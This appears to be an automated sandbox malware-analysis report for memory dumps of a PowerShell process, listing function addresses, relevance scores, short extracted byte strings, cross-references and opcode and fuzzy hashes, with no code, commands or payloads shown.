String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$h2jk$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-919930682
Opcode ID: 3d6c1326afb65a74e3de6ad911b2f3aeed3bdcbdf472ee4e61f5303cdd31dc02
Instruction ID: 0b830d7f91a5470f5459031d63ad0fdcdd482613dc87bf905863097c42b5014e
Opcode Fuzzy Hash: 3d6c1326afb65a74e3de6ad911b2f3aeed3bdcbdf472ee4e61f5303cdd31dc02
Instruction Fuzzy Hash: E292BE70B042089FDB24CF68C551AAABBF2AF89315F14C06BE9059F751DB76DC81CBA1

Function 09412505 Relevance: 18.4, Strings: 13, Instructions: 2130COMMON

Download Yara Rule

Strings

$^q, xrefs: 094125D7
tP^q, xrefs: 094130E4
$^q, xrefs: 094125BB
84ul, xrefs: 09413087
tP^q, xrefs: 094130D8
84ul, xrefs: 0941307B
4'^q, xrefs: 0941260B
84ul, xrefs: 09412F5A
tP^q, xrefs: 09412FC3
4'^q, xrefs: 094125FF
84ul, xrefs: 09412F66
$^q, xrefs: 094125E3
tP^q, xrefs: 09412FB7

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$84ul$84ul$84ul$84ul$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-3533978121
Opcode ID: 39af65782b2bbc9ca1249bd44682218f50ee0e797eafb566307a373ae2517f0b
Instruction ID: 33f1b8b89bea253469ca587c69ae1eca804dfd09ee38b8dfabb4376602f4b326
Opcode Fuzzy Hash: 39af65782b2bbc9ca1249bd44682218f50ee0e797eafb566307a373ae2517f0b
Instruction Fuzzy Hash: 8982C030B002099FCB159F68C855AABBBE2BF85351F1484ABE915CF391DB71DC85CBA1

Function 07B2BEFF Relevance: 14.7, Strings: 11, Instructions: 994COMMON

Download Yara Rule

Strings

4tl, xrefs: 07B2CAD6
x.hk, xrefs: 07B2C680
4'^q, xrefs: 07B2CBEA
4'^q, xrefs: 07B2C451
4tl, xrefs: 07B2CAE0
(fwl, xrefs: 07B2CDED
4'^q, xrefs: 07B2CBD4
(fwl, xrefs: 07B2CE03
x.hk, xrefs: 07B2CFBD
-hk, xrefs: 07B2C6B2
4'^q, xrefs: 07B2C445

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$4tl$4tl$x.hk$x.hk$-hk
API String ID: 0-3394531315
Opcode ID: cf3f3c4e98d8e5037618093cd441a1224a9fd02bbdff78cbc1577ea0b0328505
Instruction ID: acc1fcda074a75e4c121e3c147e8caa6d1c6d2da3fbfdaf6812b08291a35dab4
Opcode Fuzzy Hash: cf3f3c4e98d8e5037618093cd441a1224a9fd02bbdff78cbc1577ea0b0328505
Instruction Fuzzy Hash: AE9231F0A002189FDB64DB58C951BAABBB2EB85304F5081E5D90D5F391CB72ED86CF91

Function 07B22E80 Relevance: 11.0, Strings: 8, Instructions: 986COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B23BE2
4'^q, xrefs: 07B22FD9
tP^q, xrefs: 07B23170
4'^q, xrefs: 07B2396E
tP^q, xrefs: 07B23164
-hk, xrefs: 07B23C14
4'^q, xrefs: 07B22FE5
4'^q, xrefs: 07B23962

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.hk$-hk
API String ID: 0-2349274253
Opcode ID: d727d232104cf76b3348b39d7308cfdd2bdf3bdd5ad81595a0ef95456930fab3
Instruction ID: 66f1aa39c9acd486fb6d5810ea8a522b291ab6ea84dbb42f45437edff92f41b3
Opcode Fuzzy Hash: d727d232104cf76b3348b39d7308cfdd2bdf3bdd5ad81595a0ef95456930fab3
Instruction Fuzzy Hash: 8F82B3B0B012259FDB14CB68C945BAABBF2EB85304F14C0E5D90D9F391CB75DD868BA1

Function 07B24A78 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

(fwl, xrefs: 07B24B99
4'^q, xrefs: 07B24D81
(fwl, xrefs: 07B24BA3
-hk, xrefs: 07B24E91
4'^q, xrefs: 07B24E0C
x.hk, xrefs: 07B24E4C
4'^q, xrefs: 07B24D8D
4'^q, xrefs: 07B24E00

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$x.hk$-hk
API String ID: 0-3769942141
Opcode ID: 1eabb9d2d9c999a0832cbc9f3bae0d71cbdd8cac2559b2331dc5cfef2b75bc00
Instruction ID: c845c3ed69861add3641c3fafe0927219f63f2846ca0cf145b4a12a44f7f600c
Opcode Fuzzy Hash: 1eabb9d2d9c999a0832cbc9f3bae0d71cbdd8cac2559b2331dc5cfef2b75bc00
Instruction Fuzzy Hash: 53E1D5F0A012149FDB18DB68C555B6EBBB3EF88301F10C4A5D9096F795CB71EC468BA1

Function 07B24058 Relevance: 8.1, Strings: 6, Instructions: 640COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B24344
(fwl, xrefs: 07B248D5
4'^q, xrefs: 07B24350
4'^q, xrefs: 07B245C6
4'^q, xrefs: 07B245D2
(fwl, xrefs: 07B248DF

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q
API String ID: 0-109293324
Opcode ID: 7038dbf2126a533cceff68cddaae5caf48e5dffb2c07c5d68444f5a40eef6906
Instruction ID: 1279779db4858688e5a3bab529690e768193176673853d7fa01d1b1446e79a8f
Opcode Fuzzy Hash: 7038dbf2126a533cceff68cddaae5caf48e5dffb2c07c5d68444f5a40eef6906
Instruction Fuzzy Hash: 53428EF0B012549FEB14CB58C545BADBBB2EF84305F2480A5E909AF795CB72ED42CB91

Function 07B20F88 Relevance: 8.1, Strings: 6, Instructions: 594COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B212F6
tP^q, xrefs: 07B21013
tP^q, xrefs: 07B2101F
4'^q, xrefs: 07B21578
4'^q, xrefs: 07B21302
4'^q, xrefs: 07B21584

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-445857065
Opcode ID: 6a9221f32b0a5b50faa4e6c1d82386516f08cb0b8acc67eb26be8e30bcdc1dbe
Instruction ID: 1239941ec8e186d4d888ec1e656b4036171e96e246a03d126df1ab9f7fb85a29
Opcode Fuzzy Hash: 6a9221f32b0a5b50faa4e6c1d82386516f08cb0b8acc67eb26be8e30bcdc1dbe
Instruction Fuzzy Hash: 7B3261F0B012199FEB14CB5CC555BAAB7B2EB85315F14C0A9E9099F391CB72EC42CB91

Function 07B24A58 Relevance: 6.6, Strings: 5, Instructions: 303COMMON

Download Yara Rule

Strings

(fwl, xrefs: 07B24B99
4'^q, xrefs: 07B24D81
-hk, xrefs: 07B24E91
x.hk, xrefs: 07B24E4C
4'^q, xrefs: 07B24E00

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$4'^q$4'^q$x.hk$-hk
API String ID: 0-3948404401
Opcode ID: 15cb1ec67fd63a7c5943cadfa21ce775512a31c8879e7dc860e2c245688b0eb4
Instruction ID: af4365f2015fd9723345b145dd0857c776b59a8dbc40077b6a9e2c373fc20653
Opcode Fuzzy Hash: 15cb1ec67fd63a7c5943cadfa21ce775512a31c8879e7dc860e2c245688b0eb4
Instruction Fuzzy Hash: 7CC1C1F0A012159FEB28DF58C541BAEBBB2EB88304F10C495D9096F795CB71EC469BA1

Function 07B273E0 Relevance: 5.6, Strings: 4, Instructions: 582COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B27882
4'^q, xrefs: 07B27878
4'^q, xrefs: 07B27728
4'^q, xrefs: 07B2771E

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: effbc49961fa0671d0a59a3cae11f8326dd76e1d8d7f15230276f3fb4657867e
Instruction ID: 1555faad9ff1d3757bfaa57035554b591d0deeb9c980ac57a55b3b16544ebe34
Opcode Fuzzy Hash: effbc49961fa0671d0a59a3cae11f8326dd76e1d8d7f15230276f3fb4657867e
Instruction Fuzzy Hash: 411279F1B012258FEB259B3888156BABBA2DFC6311F1484FAD609CF251DF31C942D7A5

Function 07B2C8D1 Relevance: 5.4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

4tl, xrefs: 07B2CAD6
(fwl, xrefs: 07B2CDED
4'^q, xrefs: 07B2CBD4
x.hk, xrefs: 07B2CFBD

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$4'^q$4tl$x.hk
API String ID: 0-1449149415
Opcode ID: 45bb11d3f29e7829f9a65e4e2c0595ff8e912406fdfe1388678dd642bcd293a3
Instruction ID: b250c0c5b2a5421e2e4db619ca845816474bfef6c5c5be4117c4507c3a92c4d9
Opcode Fuzzy Hash: 45bb11d3f29e7829f9a65e4e2c0595ff8e912406fdfe1388678dd642bcd293a3
Instruction Fuzzy Hash: 93124CF0A01229DFEB64CB14C950BAABBB2FB45304F5081E5D90D5B351CB72AD86DFA1

Function 07B2C8BB Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

4tl, xrefs: 07B2CAD6
(fwl, xrefs: 07B2CDED
4'^q, xrefs: 07B2CBD4
x.hk, xrefs: 07B2CFBD

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$4'^q$4tl$x.hk
API String ID: 0-1449149415
Opcode ID: bb176911a1de02267c747e68f8804fe783305f41d21afb06e38f658b144b08da
Instruction ID: 85a6ff8f9eecd44b5fd97deb0c95f9bca22c01b28fc7f212e3bc1c4ace9ed7d0
Opcode Fuzzy Hash: bb176911a1de02267c747e68f8804fe783305f41d21afb06e38f658b144b08da
Instruction Fuzzy Hash: 0AE14FF0A01229DFEB64CB14C950BAABBB2FB45304F5081E5D90D6B351CB72AD86DF91

Function 07B250D0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(fwl, xrefs: 07B251D1
(fwl, xrefs: 07B251C7
(fwl, xrefs: 07B25245
(fwl, xrefs: 07B2524F

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$(fwl$(fwl$(fwl
API String ID: 0-2555649572
Opcode ID: 9dfceaf3f285effa3d27fbc41b2263011e22d0f12540150d55cd7aabee4bd595
Instruction ID: 93b92046cebdcfce7cfb0ee132c58b2bfc0d2a2a21b3e705355b10bcff9402b0
Opcode Fuzzy Hash: 9dfceaf3f285effa3d27fbc41b2263011e22d0f12540150d55cd7aabee4bd595
Instruction Fuzzy Hash: 5B7170F0B01219DFEB24CF58C941A6ABBA2EF89311F14C0E9D8099B355CB71DD52DBA1

Function 07B23CAA Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B23BE2
-hk, xrefs: 07B23C14
4'^q, xrefs: 07B23962

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.hk$-hk
API String ID: 0-3546449468
Opcode ID: d8cc31aefd57692ac9fe1e54e14112bee22f5c3e431f2f4d28f26049428ddf05
Instruction ID: 9ade46aea05835adb296c04ab5b49f1934309aa7f07a70d780a40192ddac1290
Opcode Fuzzy Hash: d8cc31aefd57692ac9fe1e54e14112bee22f5c3e431f2f4d28f26049428ddf05
Instruction Fuzzy Hash: E6527EB0B002149FDB54CB28C955FA9BBB2EB85304F50C1D5DA0D9B395CB76ED828FA1

Function 07B2C74B Relevance: 4.4, Strings: 3, Instructions: 621COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B2C680
-hk, xrefs: 07B2C6B2
4'^q, xrefs: 07B2C445

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.hk$-hk
API String ID: 0-3546449468
Opcode ID: 35f40ecb804fca635936601d9b201fe2f0bb7b17e25858fdc1e58318c0742801
Instruction ID: bd5bc0e66214611203ffc9a4967788a094fd1171e0e5997de6658973e0b28b37
Opcode Fuzzy Hash: 35f40ecb804fca635936601d9b201fe2f0bb7b17e25858fdc1e58318c0742801
Instruction Fuzzy Hash: 51422DF0B002149FDB14DB18C951FAABBB2EB89304F50C1A5DA095F391CB72ED868F91

Function 07B23DBC Relevance: 4.2, Strings: 3, Instructions: 486COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B23BE2
-hk, xrefs: 07B23C14
4'^q, xrefs: 07B23962

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.hk$-hk
API String ID: 0-3546449468
Opcode ID: 87441a06f544fa8518fde9dbb81f69e1170c2a73361695ae34111b5d32bf4a3b
Instruction ID: e87b569b8ddebb0b5e15f099e889c6332259e6326dd530cd905bd7823041fa04
Opcode Fuzzy Hash: 87441a06f544fa8518fde9dbb81f69e1170c2a73361695ae34111b5d32bf4a3b
Instruction Fuzzy Hash: FC2291B0A002149FDB54CB18C955FA9BBB2EB85344F50C0D5DA0DAF391CB76ED868FA1

Function 07B2C834 Relevance: 4.2, Strings: 3, Instructions: 467COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B2C680
-hk, xrefs: 07B2C6B2
4'^q, xrefs: 07B2C445

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.hk$-hk
API String ID: 0-3546449468
Opcode ID: a89faf4710ca8fd7466eb5c4079eb8734b593c91c49b484a7557a73596b1ddd9
Instruction ID: 59a9be094f4a83462765ed03ccc5e84c05c1ae061c2f365be04e7afd3f02f63d
Opcode Fuzzy Hash: a89faf4710ca8fd7466eb5c4079eb8734b593c91c49b484a7557a73596b1ddd9
Instruction Fuzzy Hash: 0E121FF0B002149FDB54DB58C951FABBBB2EB85304F5081A5DA095F391CB72ED868FA1

Function 07B20840 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B2089B
$^q, xrefs: 07B208A7
$^q, xrefs: 07B20863

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: b953df4f2cbacf74d913e0dcbc9e3fb8c4729acad11826bc37ee46469ccf84bc
Instruction ID: 59a4a338a030dae287de4f85be92991bf27a4d85425a4e6c40569872b7b17269
Opcode Fuzzy Hash: b953df4f2cbacf74d913e0dcbc9e3fb8c4729acad11826bc37ee46469ccf84bc
Instruction Fuzzy Hash: FC4139F2F012269BEB286A6D894426BB7E1EF84210B24856AC81DDF345DE31D906D7E1

Function 07B24034 Relevance: 3.0, Strings: 2, Instructions: 486COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B24344
4'^q, xrefs: 07B245C6

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: fce8729aae71fc27d18ef80378ba6573ad27f5219d1a0e7e52fa46dd7f14a945
Instruction ID: 536bad15788d4e51311e9ab3d9f767ec124c9b735a3ad2b2ddf00269f8679abe
Opcode Fuzzy Hash: fce8729aae71fc27d18ef80378ba6573ad27f5219d1a0e7e52fa46dd7f14a945
Instruction Fuzzy Hash: B3126EF4B01254AFE714CB58C441F99BBB2EF85304F1580A5E909AF795CBB2ED82CB91

Function 07B2178A Relevance: 2.9, Strings: 2, Instructions: 391COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07B212F6
4'^q, xrefs: 07B21578

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 40ca48f580ad96a4e4ffb41d6290cc8b97ff07a634bba984a73c8999eafe8b50
Instruction ID: ebe17fa7da100a447f86392adca6d9e3666925aa62873f23dc3a0212d9be5925
Opcode Fuzzy Hash: 40ca48f580ad96a4e4ffb41d6290cc8b97ff07a634bba984a73c8999eafe8b50
Instruction Fuzzy Hash: B1F14CF4B01218AFEB14CB58C545BA9B7B2FB84315F15C0A5E9099F391CBB2ED42CB91

Function 07B250AE Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

(fwl, xrefs: 07B251C7
(fwl, xrefs: 07B25245

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: (fwl$(fwl
API String ID: 0-2797258600
Opcode ID: 3a3b869234de115b2f9e01908671ef0d073daa368d46cab384d850cb77e4d4cc
Instruction ID: b14af528480c4e4f53d0c06dc890a6b7706dfe2051f4a978ccb88156af6c1210
Opcode Fuzzy Hash: 3a3b869234de115b2f9e01908671ef0d073daa368d46cab384d850cb77e4d4cc
Instruction Fuzzy Hash: 4B619CF0A02255DFEB24CF58C841AA9BBB2FF49310F14C1E9D809AB255C771ED52DBA1

Function 07B209C8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07B20A78
tP^q, xrefs: 07B20A6C

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 95e73edc49cb367c463e80c3eeedb83df225767d7f89bbf238e0554c0ad1ad18
Instruction ID: 75151be6794993c0381407aed0da750fac3c27d064991dfd8484509129344795
Opcode Fuzzy Hash: 95e73edc49cb367c463e80c3eeedb83df225767d7f89bbf238e0554c0ad1ad18
Instruction Fuzzy Hash: A7517CF1B053659FEB25AA68840472ABBA2DF86315F14C4FBE50DCF251CA71C842D3A1

Function 07B20820 Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

$^q, xrefs: 07B2089B
$^q, xrefs: 07B20863

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: e629aeb2ae3c8b3fb763810e3419c488b6e030de915ef05ca435496076979505
Instruction ID: 7d0fc81083eb8acba807512e2b52796cf8802071204762af268cebd68fb2b97d
Opcode Fuzzy Hash: e629aeb2ae3c8b3fb763810e3419c488b6e030de915ef05ca435496076979505
Instruction Fuzzy Hash: EF2149F5D05226DFEB24AF698448266BFF0FF05210F2805EAC80CAF205EB319801D7D1

Function 04FDDD28 Relevance: 2.5, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04FDDD3F
4'^q, xrefs: 04FDDD51

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 0edcc9fe72af14f6a5eb0f3addfa1cdd4a118455b433591458d0fb84b77dbef5
Instruction ID: c6b7212066a01bf1f1bef0db3f932638ab4058c33d62aac403c47b6bb2fa903e
Opcode Fuzzy Hash: 0edcc9fe72af14f6a5eb0f3addfa1cdd4a118455b433591458d0fb84b77dbef5
Instruction Fuzzy Hash: E601D4306053500EE72AAB769810AAE7BE2EFC1251F148E6ED8CA4F595DE70684E8361

Function 04FDDD38 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04FDDD3F
4'^q, xrefs: 04FDDD51

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: cc9be118f90d9878c8b69eebce76411ed344f18b94dab10253dedf92cbe0399e
Instruction ID: 2fb326651d1ff815c083827378f6774e919089b458c9558fbf2d373e8509a118
Opcode Fuzzy Hash: cc9be118f90d9878c8b69eebce76411ed344f18b94dab10253dedf92cbe0399e
Instruction Fuzzy Hash: 03F0C2302007140BE728EB66E910A6F76D7EFC0252F008D2DE98A4B684DF70784E43A1

Function 0941118E Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

(fwl, xrefs: 09411371

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
String ID: (fwl
API String ID: 0-753020189
Opcode ID: af8f393a7efebbc24afe9b7b51316bcb07f292904da62666f8283b4f47c2246b
Instruction ID: bcbc2378f986f68a4b45e77a1af2e51ddef27ce47b9eca0610c74fda09cabb99
Opcode Fuzzy Hash: af8f393a7efebbc24afe9b7b51316bcb07f292904da62666f8283b4f47c2246b
Instruction Fuzzy Hash: 15813B74A04204DFDB24CF58C585EAABBF2AB8D314F15C0AAEA05AB755C772EC41CB61

Function 094111A0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

(fwl, xrefs: 09411371

Memory Dump Source

Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9410000_powershell.jbxd

Similarity

API ID:
String ID: (fwl
API String ID: 0-753020189
Opcode ID: bac86f64544aa3f1bcf9aee5cf95535761f9183b6a2a718715a1632e04e5a590
Instruction ID: c41eb16a9ad1f79fa70257677f9f53e7f6593cc9cee07ce7d7ed977bafc1bd17
Opcode Fuzzy Hash: bac86f64544aa3f1bcf9aee5cf95535761f9183b6a2a718715a1632e04e5a590
Instruction Fuzzy Hash: FC813C74A04204DFDB24CF58C585EAABBF2AF8D314F14C06AEA05AB755CB72EC41CB61

Function 04FDEEC0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04FDEED2

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 4d277ebfb007d7db5b085d4fa2f1eb441b519928fded02f699bcb41ec4fdaa0d
Instruction ID: b37bf2fc630b8126908120dfb792631f8dc492601f81d2288f72358cfc7660a1
Opcode Fuzzy Hash: 4d277ebfb007d7db5b085d4fa2f1eb441b519928fded02f699bcb41ec4fdaa0d
Instruction Fuzzy Hash: 4B41F670B003645BDB19DBA9D840BAE7FA3AFC8301F188529E5056F395CF70A8468B95

Function 07B24F18 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.hk, xrefs: 07B24FCA

Memory Dump Source

Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd

Similarity

API ID:
String ID: x.hk
API String ID: 0-3394790906
Opcode ID: 18ad534bc77ffcb970eadd65498a2940a0af31bbb42b8d1e974503a79da299dc
Instruction ID: a9a724dc4d8224ae35b39819bf992a2dc8c3814c37c576e86068426e1b36dd3b
Opcode Fuzzy Hash: 18ad534bc77ffcb970eadd65498a2940a0af31bbb42b8d1e974503a79da299dc
Instruction Fuzzy Hash: 3C31C5B0B001149BE7189B68C915BAF7AA3EF84350F10C064EA056F3D1CFB6AD429BE1

Function 04FDD528 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

(bq, xrefs: 04FDD539

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 53b4f8bfb9a2254a976c45054a47c50b55997498890e807a0f47816f07e9c5ad
Instruction ID: 07d81d63e7923c0a8cd6a2451e7986f9edc26dbd51d1a1f7e6a20576c552d2e8
Opcode Fuzzy Hash: 53b4f8bfb9a2254a976c45054a47c50b55997498890e807a0f47816f07e9c5ad
Instruction Fuzzy Hash: A8212B347093504FC70AAB78981466D7FA3DFC6206B5884AFD546CB796CE34AC06C751

Function 04FDEEC8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04FDEED2

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f002a51c6db00760c837a181501e7b1d6b87f28e1e6df2987e758c83a22a7012
Instruction ID: 51fd12a20758380e350c266dee2061dca6bfabff6899515ab7df0727be690dd6
Opcode Fuzzy Hash: f002a51c6db00760c837a181501e7b1d6b87f28e1e6df2987e758c83a22a7012
Instruction Fuzzy Hash: 71F0F6303003102BE71CA6A59C50F6E7797EBC4A55F504D3DE9094F385DD61BC494395

Function 04FD72A0 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false

